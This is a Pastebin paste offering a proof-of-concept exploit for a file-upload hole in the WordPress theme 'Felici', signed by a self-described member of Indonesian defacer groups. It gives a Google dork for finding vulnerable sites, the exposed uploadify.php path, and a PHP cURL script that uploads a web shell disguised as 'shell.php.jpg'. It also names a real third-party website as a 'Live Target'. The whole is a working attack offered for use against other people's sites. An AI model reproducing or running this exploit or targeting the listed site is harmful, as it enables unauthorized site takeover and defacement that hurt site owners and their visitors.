Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

[POC] Wordpress Theme Felici Shell Upload

Berandal666 Mar 16th, 2017 309 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. #################################################################################
  2. # Wordpress Themes Felici Shell Upload Vulnerability
  3. # Author : Berandal
  4. # Google Dork: inurl:"/wp-content/themes/felici/"
  5. # Tested on: Win 7, Linux
  6. # Blog : http://www.maxteroit.com/
  7. #################################################################################
  8.  
  9. +-+-+-+-+-+-+-+-+
  10. |B|e|r|a|n|d|a|l|
  11. +-+-+-+-+-+-+-+-+
  12.  
  13. # [!] Exploit : http://127.0.0.1wp-content/themes/felici/sprites/js/uploadify/uploadify.php
  14.  
  15. # [!] File Location : http://127.0.0.1/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/shell.php.jpg
  16.  
  17. #################################################################################
  18. #[*] Exploiter:
  19. #################################################################################
  20. <?php
  21.  
  22. $uploadfile="shell.php.jpg";
  23.  
  24. $ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
  25. curl_setopt($ch, CURLOPT_POST, true);
  26. curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
  27. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  28. $postResult = curl_exec($ch);
  29. curl_close($ch);
  30. print "$postResult";
  31.  
  32. ?>
  33. #################################################################################
  34. # Live Target:
  35. http://trendingchannel.com/wp-content/themes/felici/sprites/js/uploadify/uploadify.php
  36. #################################################################################
  37. # [*] ABOUT:
  38. #################################################################################
  39. # Facebook: https://www.facebook.com/owlsquad.id
  40. # Twitter: https://www.twitter.com/id_berandal
  41. # Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
  42. #################################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top